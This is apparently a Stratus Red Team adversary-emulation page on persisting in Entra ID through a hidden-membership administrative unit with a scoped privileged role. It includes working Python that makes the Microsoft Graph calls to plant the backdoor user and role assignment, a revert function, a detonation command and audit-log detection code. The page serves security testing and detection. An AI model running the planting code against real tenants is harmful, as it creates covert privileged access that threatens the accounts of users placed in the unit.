
Create Hidden Scoped Role Assignment Through HiddenMembership AU

Platform: Entra ID

MITRE ATT&CK Tactics

  • Persistence

Description

Creates an Administrative Unit (AU) with hidden membership, and a scoped role assignment over this AU. This simulates an attacker who persists privileged access through a backdoor user whose role is scoped to the AU rather than granted tenant-wide, so it is easy to overlook.

Warm-up:

  • Create the target (victim) Entra ID user

Detonation:

  • Create an administrative unit with hidden membership
  • Create a backdoor Entra ID user
  • Add the target (victim) user to the administrative unit
  • Assign the backdoor user the Privileged Authentication Administrator role, scoped to the administrative unit

This simulates an attacker that indirectly persists their access. The backdoor user can now perform privileged operations against any user in the administrative unit, for instance resetting the target user's password, which can be used to escalate privileges or maintain access. Because the role assignment is scoped to the AU rather than tenant-wide, and the AU's membership is hidden, the backdoor is easy to miss in a review of tenant-level role members.
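The same four detonation steps, replayed as Microsoft Graph REST calls. This is an added example and not the Stratus Red Team implementation (which uses Terraform). The endpoints, request bodies and the `/administrativeUnits/{id}` form of `directoryScopeId` are taken from the Graph API reference; the `send` callable, the `RecordingSender` dry-run fake, and every name, UPN and ID in the sample run are assumptions for illustration.

```python
"""Replay of the hidden-AU detonation as Microsoft Graph REST calls.

Added example, not the Stratus Red Team code. `send(method, url, body)` is an
injected callable so the sequence can be dry-run offline against a fake."""
import json
import urllib.parse
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"


def graph_sender(access_token):
    """Return a send() backed by urllib. Assumes the caller already holds a
    Graph token with the permissions needed for the calls below."""
    def send(method, url, body):
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(url, data=data, method=method, headers={
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "application/json"})
        with urllib.request.urlopen(req) as resp:
            raw = resp.read()
        return json.loads(raw) if raw else {}  # member add and DELETE return 204
    return send


class RecordingSender:
    """Offline stand-in for send(): records each call and returns constructed IDs."""
    def __init__(self):
        self.calls = []

    def __call__(self, method, url, body):
        self.calls.append((method, url, body))
        if "roleDefinitions" in url:
            return {"value": [{"id": "role-def-constructed"}]}
        return {"id": f"constructed-{len(self.calls)}"}


def plant_hidden_au_backdoor(send, victim_user_id, backdoor_upn, backdoor_password,
                             au_name="Support Staff",
                             role_display_name="Privileged Authentication Administrator"):
    """Perform the four detonation steps; returns the IDs needed for clean-up."""
    # Step 1: administrative unit whose member list is hidden from non-admins
    au = send("POST", f"{GRAPH}/directory/administrativeUnits",
              {"displayName": au_name, "visibility": "HiddenMembership"})
    # Step 2: backdoor user
    user = send("POST", f"{GRAPH}/users", {
        "accountEnabled": True,
        "displayName": au_name,
        "mailNickname": backdoor_upn.split("@", 1)[0],
        "userPrincipalName": backdoor_upn,
        "passwordProfile": {"password": backdoor_password,
                            "forceChangePasswordNextSignIn": False}})
    # Step 3: the victim becomes a member of the AU
    send("POST", f"{GRAPH}/directory/administrativeUnits/{au['id']}/members/$ref",
         {"@odata.id": f"{GRAPH}/users/{victim_user_id}"})
    # Step 4: resolve the role definition by name, then assign it scoped to the AU only
    filt = urllib.parse.quote(f"displayName eq '{role_display_name}'")
    defs = send("GET", f"{GRAPH}/roleManagement/directory/roleDefinitions?$filter={filt}", None)
    assignment = send("POST", f"{GRAPH}/roleManagement/directory/roleAssignments", {
        "@odata.type": "#microsoft.graph.unifiedRoleAssignment",
        "roleDefinitionId": defs["value"][0]["id"],
        "principalId": user["id"],
        "directoryScopeId": f"/administrativeUnits/{au['id']}"})
    return {"administrative_unit_id": au["id"], "backdoor_user_id": user["id"],
            "role_assignment_id": assignment["id"]}


def remove_hidden_au_backdoor(send, ids):
    """Revert: drop the scoped assignment, then the backdoor user, then the AU."""
    send("DELETE", f"{GRAPH}/roleManagement/directory/roleAssignments/{ids['role_assignment_id']}", None)
    send("DELETE", f"{GRAPH}/users/{ids['backdoor_user_id']}", None)
    send("DELETE", f"{GRAPH}/directory/administrativeUnits/{ids['administrative_unit_id']}", None)


if __name__ == "__main__":
    # Dry run against the recording fake (all IDs constructed); use graph_sender(token)
    # against a lab tenant you own to execute for real.
    fake = RecordingSender()
    created = plant_hidden_au_backdoor(fake, "00000000-0000-0000-0000-000000000001",
                                       "svc-support@contoso.example", "<constructed>")
    for method, url, _ in fake.calls:
        print(method, url)
    remove_hidden_au_backdoor(fake, created)
```

The role is looked up by display name at run time rather than hard-coded, so the same function can assign any AU-scopable role; the returned IDs let the revert step undo exactly what was created, which is what Stratus's own clean-up does for this technique.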

Instructions

Detonate with Stratus Red Team
stratus detonate entra-id.persistence.hidden-au

Detection

Using Entra ID audit logs, look for the following activity types. Each of them is also a routine administrative action, so correlate them by initiating actor and time rather than alerting on any one of them alone:

For Service: Core Directory and Category: AdministrativeUnit:

  • Add administrative unit
  • Add member to administrative unit

For Service: Core Directory and Category: RoleManagement:

  • Add scoped member to role
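Detection logic for the three activity types above, run over constructed audit records. This is an added example, not part of the Stratus Red Team page: it alerts when one actor creates an administrative unit, adds a member to it and then creates a scoped role assignment inside a short window. The record field names follow the Entra ID audit log schema (activityDisplayName, category, loggedByService, initiatedBy, targetResources, modifiedProperties); the assumption that the AU appears as a non-User target resource, the `Role.DisplayName` property name, the 30-minute window and every ID, UPN and timestamp are assumptions made for this example.

```python
"""Correlate Entra ID audit-log records into a hidden-AU backdoor alert.

Added example, not Stratus Red Team code. Sample records are constructed."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

AU_CREATE = "Add administrative unit"
AU_ADD_MEMBER = "Add member to administrative unit"
SCOPED_ROLE = "Add scoped member to role"
INTERESTING = {AU_CREATE, AU_ADD_MEMBER, SCOPED_ROLE}


def _actor(rec):
    init = rec.get("initiatedBy") or {}
    user, app = init.get("user") or {}, init.get("app") or {}
    return user.get("userPrincipalName") or app.get("displayName") or "unknown"


def _when(rec):
    return datetime.fromisoformat(rec["activityDateTime"].replace("Z", "+00:00"))


def _au_ids(rec):
    # Assumption: on AU events the AU itself is the target resource whose type is not User.
    return {t["id"] for t in rec.get("targetResources", []) if t.get("type") != "User"}


def _role_name(rec):
    # Entra encodes modifiedProperties values as JSON strings, e.g. "\"Name\"".
    for t in rec.get("targetResources", []):
        for p in t.get("modifiedProperties", []):
            if p.get("displayName") == "Role.DisplayName" and p.get("newValue"):
                try:
                    return json.loads(p["newValue"])
                except ValueError:
                    return p["newValue"]
    return "unknown"


def detect_hidden_au_backdoor(records, window=timedelta(minutes=30)):
    """Alert when one actor creates an AU, adds a member to it and then creates a
    scoped role assignment, all within `window` and all logged by Core Directory."""
    by_actor = defaultdict(list)
    for rec in records:
        if rec.get("loggedByService") == "Core Directory" and rec.get("activityDisplayName") in INTERESTING:
            by_actor[_actor(rec)].append(rec)
    alerts = []
    for actor, events in by_actor.items():
        events.sort(key=_when)
        for i, role_evt in enumerate(events):
            if role_evt["activityDisplayName"] != SCOPED_ROLE:
                continue
            earliest = _when(role_evt) - window
            prior = [e for e in events[:i] if _when(e) >= earliest]
            created = {au for e in prior if e["activityDisplayName"] == AU_CREATE for au in _au_ids(e)}
            populated = {au for e in prior if e["activityDisplayName"] == AU_ADD_MEMBER for au in _au_ids(e)}
            hits = created & populated  # AU both created and populated by this actor in-window
            if hits:
                alerts.append({"actor": actor, "administrative_units": sorted(hits),
                               "role": _role_name(role_evt), "time": role_evt["activityDateTime"]})
    return alerts


def _rec(ts, activity, category, actor, targets):
    """Build one constructed audit record in the Entra audit-log shape."""
    return {"activityDateTime": ts, "activityDisplayName": activity, "category": category,
            "loggedByService": "Core Directory",
            "initiatedBy": {"user": {"userPrincipalName": actor}}, "targetResources": targets}


ATTACKER, HELPDESK = "attacker@contoso.example", "helpdesk@contoso.example"
ROLE_PROP = [{"displayName": "Role.DisplayName", "oldValue": None,
              "newValue": json.dumps("Privileged Authentication Administrator")}]

SAMPLE_RECORDS = [  # constructed sample data
    # Attack chain: AU created, victim added, scoped assignment two minutes later
    _rec("2024-05-01T10:00:00Z", AU_CREATE, "AdministrativeUnit", ATTACKER,
         [{"id": "au-1111", "type": "Other", "displayName": "Support Staff"}]),
    _rec("2024-05-01T10:01:00Z", AU_ADD_MEMBER, "AdministrativeUnit", ATTACKER,
         [{"id": "user-victim", "type": "User"}, {"id": "au-1111", "type": "Other"}]),
    _rec("2024-05-01T10:02:00Z", SCOPED_ROLE, "RoleManagement", ATTACKER,
         [{"id": "user-backdoor", "type": "User", "modifiedProperties": ROLE_PROP}]),
    # Routine: helpdesk scoped assignment hours after its own AU work (outside the window)
    _rec("2024-05-01T08:00:00Z", AU_CREATE, "AdministrativeUnit", HELPDESK,
         [{"id": "au-2222", "type": "Other", "displayName": "Region EU"}]),
    _rec("2024-05-01T08:05:00Z", AU_ADD_MEMBER, "AdministrativeUnit", HELPDESK,
         [{"id": "user-eu-1", "type": "User"}, {"id": "au-2222", "type": "Other"}]),
    _rec("2024-05-01T11:00:00Z", SCOPED_ROLE, "RoleManagement", HELPDESK,
         [{"id": "user-tier1", "type": "User", "modifiedProperties": ROLE_PROP}]),
]


def run_sample(window_minutes=30):
    return detect_hidden_au_backdoor(SAMPLE_RECORDS, timedelta(minutes=window_minutes))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The window is the main tuning knob: with the default 30 minutes only the attacker's chain fires, while widening it to several hours also flags the helpdesk sequence, so pick it from how your own administrators actually batch AU and role changes. Matching on the AU ID (created and populated by the same actor) rather than on the actor alone is what keeps an unrelated scoped assignment from triggering.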